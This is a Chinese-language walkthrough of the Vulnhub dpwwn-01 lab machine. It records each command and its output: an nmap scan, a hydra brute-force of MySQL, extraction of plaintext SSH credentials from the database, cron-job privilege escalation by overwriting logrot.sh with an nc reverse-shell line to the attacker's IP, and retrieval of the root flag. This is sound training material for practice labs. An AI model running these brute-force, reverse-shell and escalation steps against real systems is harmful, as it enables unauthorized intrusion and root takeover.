Vulnhub-dpwwn-01渗透测试执行记录

环境搭建见

https://blog.csdn.net/qq_33163046/article/details/106544200

 

攻击机:

10.42.**.56(192.168.56.111)

 

执行步骤:

 

1.nmap搜索确定靶机IP

root@kali:~# nmap -sS -Pn -A 192.168.56.0/24

......

Nmap scan report for 192.168.56.137

Host is up (0.00012s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

3306/tcp open  mysql

MAC Address: 08:00:27:C2:6A:E9 (Oracle VirtualBox virtual NIC)

 

2.对3306端口爆破

Example:  hydra -l user -P passlist.txt ftp://192.168.0.1
root@kali:~# hydra -l root -P passwd.txt -e ns -vV mysql://192.168.56.137
......
[VERBOSE] using default db 'mysql'
[STATUS] attack finished for 192.168.56.137 (waiting for children to complete te                                                                   sts)
[3306][mysql] host: 192.168.56.137   login: root
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-03 23:56:                                                                   25

 

3.用root空密码连接成功

root@kali:~# mysql -h 192.168.56.137 -p -P3306

Enter password:

Welcome to the MariaDB monitor.  Commands end with ; or \g.

Your MariaDB connection id is 16

Server version: 5.5.60-MariaDB MariaDB Server



Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.



Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.



MariaDB [(none)]>

 

4.查看有哪些数据库,注意到ssh,并获取到一个可用的ssh账号密码

MariaDB [(none)]> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| mysql              |

| performance_schema |

| ssh                |

+--------------------+

4 rows in set (0.049 sec)



MariaDB [(none)]> use ssh;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A



Database changed



MariaDB [ssh]> select * from users;

+----+----------+---------------------+

| id | username | password            |

+----+----------+---------------------+

|  1 | mistic   | testP@$$swordmistic |

+----+----------+---------------------+

1 row in set (0.054 sec)

 

5.在攻击机用账号密码SSH登陆靶机

root@kali:~# ssh -p22 [email protected]

[email protected]'s password:

Last failed login: Thu Jun  4 03:15:19 EDT 2020 on tty1

There were 2 failed login attempts since the last successful login.

Last login: Thu Aug  1 14:41:37 2019 from 192.168.30.145

[mistic@dpwwn-01 ~]$

[mistic@dpwwn-01 ~]$ ls -l

total 4

-rwx------. 1 mistic mistic 186 Aug  1  2019 logrot.sh

6.下载并用LinEnum.sh脚本发现计划任务内存在一个每3分钟以root权限运行的脚本(logrot.sh)在mistic的用户目录下

[mistic@dpwwn-01 ~]$ chmod +x LinEnum.sh

[mistic@dpwwn-01 ~]$ ls -l

total 52

-rwxrwxr-x. 1 mistic mistic 46633 Jun  4 05:11 LinEnum.sh

-rwx------. 1 mistic mistic    36 Jun  4 03:35 logrot.sh



[mistic@dpwwn-01 ~]$ ./LinEnum.sh

......

[-] Crontab contents:

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root



# For details see man 4 crontabs



# Example of job definition:

# .---------------- minute (0 - 59)

# |  .------------- hour (0 - 23)

# |  |  .---------- day of month (1 - 31)

# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...

# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# |  |  |  |  |

# *  *  *  *  * user-name  command to be executed



*/3 *  * * *  root  /home/mistic/logrot.sh

......

 

7.在logrot.sh内添加了使用nc进行反弹shell的脚本

[mistic@dpwwn-01 ~]$ echo nc -e /bin/bash 192.168.56.111 4444 >logrot.sh

[mistic@dpwwn-01 ~]$ cat logrot.sh

nc -e /bin/bash 192.168.56.111 4444

 

8.在攻击者的主机使用nc监听4444端口等待被攻击主机上每3分钟执行的反弹shell脚本,最后得到一个交互性差的shell界面,执行权限为root。为了增加交互性,使用了python one liner增加交互界面。

root@kali:~# nc -lvvp 4444

listening on [any] 4444 ...

192.168.56.137: inverse host lookup failed: Host name lookup failure

connect to [192.168.56.111] from (UNKNOWN) [192.168.56.137] 47728

python -c 'import pty; pty.spawn("/bin/bash")'

[root@dpwwn-01 ~]# whoami

whoami

root

 

9.获取FLAG,练习结束

[root@dpwwn-01 ~]# ls

anaconda-ks.cfg  dpwwn-01-FLAG.txt

[root@dpwwn-01 ~]# cat dpwwn-01-FLAG.txt

Congratulation! I knew you can pwn it as this very easy challenge.

Thank you.



64445777

6e643634

37303737

37373665

36347077

776e6450

4077246e

33373336

36359090

LinEnum.sh脚本:https://github.com/rebootuser/LinEnum

Linux下定时执行脚本介绍:https://blog.csdn.net/ycf921244819/article/details/80520217?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase

参考文章:https://www.dongluliang.com/?p=737

 

 

你可能感兴趣的:(Penetration,test,linux,mysql,ssh,shell,数据库)